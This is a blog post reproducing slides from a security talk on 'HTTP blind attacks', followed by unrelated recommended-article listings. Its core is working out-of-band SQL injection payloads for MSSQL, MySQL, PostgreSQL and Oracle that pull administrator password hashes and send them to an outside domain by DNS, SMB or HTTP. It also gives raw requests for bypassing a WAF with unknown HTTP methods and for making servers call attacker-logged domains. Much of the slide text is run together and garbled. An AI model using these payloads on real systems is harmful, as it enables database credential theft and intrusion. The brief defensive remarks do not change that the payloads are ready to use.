http盲攻击,hacker攻击入门,白帽反思,黑帽思想,运维忙成狗

最新推荐文章于 2024-08-12 22:03:06 发布
最新推荐文章于 2024-08-12 22:03:06 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 白帽 黑帽
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/programmer_huangtao/article/details/92409081
版权

攻方:

传统漏洞越来越难挖

大型企业暴露的漏洞越来越少

对于目标站点没有任何思路

守方:

我有WAF还是被黑了

我不对公网开放还是被搞了

我天天内部整改漏洞还是被通报漏洞

1. HTTP 盲攻击是什么

2. 为什么需要HTTP 盲攻击

3. HTTP 盲攻击可能发生的场景

4. HTTP盲攻击的总体利用思路与检测实现思路HTTP 盲攻击是什么Blind Attack , Blind Inject Everything

Blind SqlInject (Normal pass)

Blind BypassWafNormaleasylet’s try

Blind Redirect(abnormal, luck is very important)

Blind CommandInject (how to injectjust don't care)

Blind PostParam (give you more, you accept it)

Blind SSRF bind local interface and no valid response

Blind Xss Injection (automatic submit,can not related to request)

Blind LDAP Injection (maybe you are using ldap)

Blind xxereverse connect you and get xml parse

Blind everything everywhere ==> fuzzing...HTTP 盲攻击是什么Blind Attack , Blind Inject Everything

HTTP盲攻击,凡是不直接使用传统的HTTP RequestHTTP Response中的已有数据进行的漏

洞挖掘与分析的攻击方式,都可以称为HTTP 盲攻击。

该攻击适用于一切难以发现传统意义漏洞的系统,也可用于对目标没有任何了解却希望快速

发现高危漏洞,同时不必关心直接目标到底存不存在漏洞的一种攻击方式。

在特定情况下可以配合利用OOB方法为基础突破口可进行检测和利用漏洞的攻击方式。

课程目标:本次课程将会介绍哪些场景可以进行HTTP Blind Attack,并尽量进行初步的分类,

来说明一些复杂网络环境下可能存在的安全漏洞。0x02 为什么需要Blind Attack

1. 传统攻击方式已经没有漏洞可挖

2. 复杂网络环境下的分析系统和监控系统存在安全漏洞无法有效发现0x02 Blind Attack Startup 1. Blind SqlInject (Nothing to say)

2. Blind Web Application Firewall bypass 绕过防护系统(变更HTTP请求方法)

3. Blind Redirect Analysis System 诱骗分析/缓存系统(变更HTTP请求URI

4. Blind CommandInject【检测】不如都来带外数据通道(OOB

5. Blind Outer to Internal System由外到内

6. 【检测】手工太麻烦使用自动插件(OOB

7. Blind PostParam 调用隐藏方法(增加或变更HTTP请求参数)

8. 寻找根源(大数据寻找源IP/新域名)1. 数据获取(经典的SQL注入利用)

问题: 目标存在注入,无法回显数据

解决:利用DNSHTTP请求获取数据

目标:在无法回显的情况下获取有价值的数据信息

防护: 限制非法的外联,包括DNS的解析Blind SqlInject Retrieve Data (OOB) MSSQL

DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)

FROM sys.sql_logins WHERE name='sa') +'.s.livesina.com'; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

MYSQL

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT

1),'.s.livesina.com\\abc'));

PostgreSQL:

DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION

temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT; DECLARE query_result TEXT; BEGIN SELECT

INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres'); exec_cmd := E'COPY

table_output(content) FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\''; EXECUTE exec_cmd; END;

$$ LANGUAGE plpgsql SECURITY DEFINER; SELECT temp_function();Blind SqlInject Retrieve Data (OOB) Oracle:

Example1:

SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');

Example2:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL; Example3:

SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL; Example4:

SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;

Example5:

SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;

Example6:

SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE

name='SYS')||'.s.livesina.com',80) FROM DUAL;2. 绕过防护系统(变更HTTP请求方式)

问题: 目标存在WAF,无法SQL注入,无法命令注入

解决:变更HTTP请求方法,WAF只处理GETPOST规则,其他自动放行。

代理服务器存在方法默认映射,不认识的方法映射为GET

目标:完成SQL注入、命令执行等

防护:更新WAF机制Blind Web Application Firewall bypass 1

GET /test?id=123 HTTP/1.1 LOL /test?id=123 HTTP/1.1 (当然可以尝试其他字符串)

Host: sina.cn

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=bBlind Web Application Firewall bypass 1 Blind Web Application Firewall bypass 2

POST /test HTTP/1.1

Host: sina.cn

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=b

c=d Blind Web Application Firewall bypass 2 POST /test.php HTTP/1.1

Host: target.com

Content-Length: 297

Pragma: no-cache

Cache-Control: no-cache

Content-Type: multipart/form-data; boundary=--------1004104974

Cookie: a=b

Connection: close

----------1004104974

Content-Disposition: form-data; name="file"; filename=""

Content-Type: application/octet-stream

----------1004104974

Content-Disposition: form-data; name="c"

d

----------1004104974

Content-Disposition: form-data; name="submit"

Submit

----------1004104974--Blind Web Application Firewall bypass

脚本检测方式:

1>变更请求方式,对比返回差异

*2>发送Payload触发Waf拦截,对比变更请求方法前后的差异

判据:

1> 返回内容不属于黑名单内容

2> 返回内容在变更方法前后保持一致

黑名单:

设置返回黑名单,如403405或特征字符串3. 诱骗分析/缓存系统(变更HTTP请求URI

问题: 没有思路

解决:变更HTTP请求URI,目标处理产生异常,分析异常找到攻击思路

目标:触发异常,分析攻击思路Blind Redirect Analysis System 1 Change URI 1

GET /test HTTP/1.1 GET test.randkey.yourloggingdomain.com HTTP/1.1

Host: sina.cn

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=bBlind Redirect Analysis System 1 Change URI 2

GET /test HTTP/1.1 GET @test.randkey.yourloggingdomain.com HTTP/1.1

Host: sina.cn

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=bBlind Redirect Analysis System 1Change URI 2

GET /test HTTP/1.1 GET http://test.randkey.yourloggingdomain.com HTTP/1.1

Host: sina.cn

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=bBlind Redirect Analysis System 1 得到的请求 Why this request

不合理的URL拼接

发生后我们才知道的漏洞Blind Redirect Caching System 2

Normal Request

GET /test HTTP/1.1

Host: sina.cn sina.cn@test.randkey.yourloggingdomain.com

Connection: close

Cache-Control: max-age=0

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/60.0.3112.113 Safari/537.36

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: https://sina.cn/

Accept-Encoding: gzip, deflate, br

Accept-Language: en,en-CA;q=0.8,be;q=0.6,zh-CN;q=0.4,zh;q=0.2

Cookie: a=bBlind Redirect Caching System 2

Normal Request

HTTP/1.1 200 OK

Content-Type: text/html;charset=utf-8

学无止境-程序猿
关注
专栏目录
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9176
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
网络安全专业名词解释
aixmmmlll的博客
05-16 3969
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
HTTP 攻击 30W 大咖课程
11-29
0x01 概要 1. HTTP 攻击是什么 2. 为什么需要HTTP 攻击 3. HTTP 攻击可能发生的场景 4. HTTP攻击的总体利用思路与检测实现思路 HTTP 攻击是什么 Blind Attack , Blind Inject Everything HTTP攻击,凡是 不直接 使用传统的HTTP Request、HTTP Response中的 已有数据 进行的漏 洞挖掘与 分析的攻击方式,都可以称为HTTP 攻击。 该攻击适用于一切难以发现传统意义漏洞的系统,也可用于对目标没有任何了解却希望快速 发现高危漏洞,同时 不必关心直接目标到底存不存在漏洞 的一种攻击方式。 在特定情况下可以配合利用OOB方法为基础突破口可进行检测和利用漏洞的攻击方式。 课程目标:本次课程将会介绍哪些场景可以进行HTTP Blind Attack,并尽量进行初
HTTP攻击视频资料及PDF文档(百度云下载)
09-28
0x01 概要 1. HTTP 攻击是什么 2. 为什么需要HTTP 攻击 3. HTTP 攻击可能发生的场景 4. HTTP攻击的总体利用思路与检测实现思路 HTTP 攻击是什么 Blind Attack , Blind Inject Everything HTTP攻击,凡是 不直接 使用传统的HTTP Request、HTTP Response中的 已有数据 进行的漏 洞挖掘与分析的攻击方式,都可以称为HTTP 攻击。 该攻击适用于一切难以发现传统意义漏洞的系统,也可用于对目标没有任何了解却希望快速 发现高危漏洞,同时 不必关心直接目标到底存不存在漏洞 的一种攻击方式。 在特定情况下可以配合利用OOB方法为基础突破口可进行检测和利用漏洞的攻击方式。 课程目标:本次课程将会介绍哪些场景可以进行HTTP Blind Attack,并尽量进行初步的分类, 来说明一些复杂网络环境下可能存在的安全漏洞。
终于轮到我了,服务器mysql被黑客攻陷了
最新发布
m0_46523467的博客
08-12 1426
mysql数据库数据恢复,备份和数据安全防护!
HTTP攻击的几种思路
07-19
FreeBuf http攻击公开课ppt 1. HTTP 攻击是什么 2. 为什么需要HTTP 攻击 3. HTTP 攻击可能发生的场景 4. HTTP攻击的总体利用思路与检测实现思路
HTTP攻击的几种思路最终版.pdf
09-28
宫华 ID:CplusHua 青藤云安全 安全研究员 知名白帽子 蚂蚁金服36W单个漏洞奖励得主 0x00 前言 攻方: 传统漏洞越来越难挖 大型企业暴露的漏洞越来越少 对于目标站点没有任何思路 守方: 我有WAF还是被黑了 我不对公网开放还是被搞了 我天天内部整改漏洞还是被通报漏洞 0x01 概要 1. HTTP 攻击是什么 2. 为什么需要HTTP 攻击 3. HTTP 攻击可能发生的场景 4. HTTP攻击的总体利用思路与检测实现思路
github pages_使用此HTTP hack重定向GitHub Pages网站
cumj63710的博客
07-10 503
github pages 我在GitHub Pages上为我的私人项目运行了一些静态网站。 我对这项服务非常满意,因为它支持自定义域,自动重定向到HTTPS并透明地安装SSL证书(通过Let's Encrypt自动颁发)。 它非常快(感谢Fastly的内容交付网络),并且非常可靠(我多年来没有遇到任何问题)。 考虑到我免费获得所有这些东西的事实,它目前完全符合我的需求。 但是,它有一个重要的...
安全术语扫
热门推荐
_南寻_的博客
02-09 1万+
行业术语扫 肉鸡 所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以像操作自己的电脑那样来操作它们,而不被对方发觉。 木马 木马就是表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。有很多黑客就是热衷于使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等 远控 远程控制,是在网络上由一台电脑(主控端Remote/客户端)远距
渗透理论概述
Auscoo111的博客
10-23 4784
渗透入门——术语概述 常见术语 渗透流程 明确目标——信息收集——漏洞探测——漏洞验证——编写报告 ——信息整理——获取所需——信息分析 脚本:动态网站(asp,php,jsp), linux, python 网站:静态网站(与后台交互比较少,如html) 动态网站(使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台lin...
为什么要学网络安全?如何学习网络安全?这3个理由告诉你(自己整理的50G网安资料)
weixin_72912381的博客
12-08 1812
相信很多小伙伴最近都听说网络安全它很火,那么网络安全它难吗?其实并不难,网络安全入门更简单!可不要被它神秘的外衣给唬住了。只要你接下来认真听完我的讲解,虽然保证不了你能成为大神,但就算你学习能力再差那也能达到入门级别。
网站克隆带目录结构httphacker
09-20
可以带目录结构的复制网站,自带爬虫。没有恶意插件,无需安装。可使用sandboxie运行。
HTTP Web的攻击技术
qq_38362049的博客
07-11 941
一.针对Web的攻击技术1.HTTP不具备必要的安全功能2.在客户端可篡改请求主动攻击:SQL注入攻击、OS注入攻击攻击者通过直接访问Web应用,把攻击代码传入攻击模式。主要攻击服务器上的资源被动攻击:跨站脚本攻击HTTP首部注入攻击、邮件注入攻击、会话固定攻击、跨站点请求伪造利用圈套策略执行代码的攻击模式。在被动攻击过程中,攻击者不直接对目标Web应用访问发起攻击。(1)攻击者诱导用户触发已设...
HTTP协议扫
和光同尘的博客
08-01 278
定义 HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。 HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件, 查询结果等)。 协议分析 一、HTTP之URL HTTP使用统一资源标识符(Uniform Resource ...
为什么现在的web漏洞越来越难挖?(手工挖DOM XSS更难)
jun2016425的博客
07-03 1265
hackerone黑客注册人数逐年增加 我们先看一下hackerone社区的报告: 2018年hackerone社区注册人数30万 2019年hackerone社区注册人数60万 2020年hackerone社区注册人数超过100万 2020年hackerone注册人数报告: 在挖web漏洞的人的比例 因为一个人可以同时挖多个大的漏洞类型:比如你既参与了web 程序,又参与了Blockchain程序的漏洞挖掘。 就是这100万(2021年了,人数应该不止了这个数了)注册的人中,有96万人参与web程序
记一次明文攻击+水印 ctf题目
qq_26317875的博客
04-01 1万+
题目链接 http://pan.baidu.com/s/1slDhhvf 密码:vroj解压出来是这样的warmup里是这样的:看着像两个一样的open_forun.png 想到明文攻击,将open_forum.png压缩,然后使用ARCHPR的明文攻击,结果报错了:在选定的档案中没有匹配的文件。。。研究了一下,找到了问题所在,原来是因为压缩软件没用对,用winrar重新压缩一次:这里要选zip。...
MySQL安全漏洞和攻击方式及预防措施
vipfanxu的博客
09-05 1617
MySQL的安全漏洞和攻击方式各不相同,然而,通过采取恰当的预防措施,可以提高MySQL的整体安全性。最重要的是,数据库管理员应当保持对新的安全漏洞和攻击方式的关注,并及时采取措施应对。MySQL是一种流行的开源关系型数据库管理系统,被广泛用于网站和应用程序的后端数据存储,然而,正因为其广泛使用,也使得MySQL成为黑客和恶意攻击者的目标。缓冲区溢出是一种利用软件漏洞的攻击方式,黑客通过向MySQL发送超长的数据或恶意数据,导致MySQL内部的缓冲区溢出,从而可以执行恶意代码或控制数据库。
黑帽Python:黑客与渗透测试编程指南
"《Black Hat Python》是一本由Justin Seitz编写的书籍,主要面向黑客和渗透测试者,教授Python编程技术。这本书旨在提供基础的知识,并激发读者进行更深入的探索。作者提到,他在Immunity公司工作,经常需要快速...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值